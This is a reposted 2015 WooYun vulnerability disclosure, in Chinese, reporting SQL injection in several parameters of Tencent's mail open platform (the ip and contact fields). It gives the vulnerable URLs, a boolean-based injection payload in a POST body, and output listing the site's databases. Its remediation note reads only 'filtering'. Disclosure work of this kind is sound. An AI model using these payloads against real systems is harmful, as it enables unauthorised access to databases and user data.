记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

腾讯邮箱开放平台多处SQL注入漏洞

2015-10-17 06:10

他域互通删除IP处



http://open.mail.qq.com/cgi-bin/communication?sid=DIBFyfQ1kYxvlhhN&t=open_communication&action=delip&ip=1.1.1.1&ef=js&resp_charset=UTF8



ip处



企业登记资料,修改处

http://open.mail.qq.com/cgi-bin/communication?s=communication&sid=DIBFyfQ1kYxvlhhN&t=open_communication&



POST

action=changecompany&contact=%C6%F3%D2%B5%C3%FB%B3%C6%3B'%2b(if((1=1),1,(select 1 union select 2)))%2b'a&phone1=233&phone2=3333333&phone3=33



contact参数



其它就不找了,所到之处基本都是呀。

漏洞证明:

1.png





2.png





3.png





4.png







code 区域
available databases [5]:

[*] domain_interflow

[*] feedbackloop

[*] information_schema

[*] mysql

[*] test

修复方案:

过滤

知识来源: www.wooyun.org/bugs/wooyun-2015-0138129

阅读:102561 | 评论:0 | 标签:注入 漏洞

想收藏或者和大家分享这篇好文章→复制链接地址

“腾讯邮箱开放平台多处SQL注入漏洞”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

九层之台,起于累土;黑客之术,始于阅读

推广

工具

标签云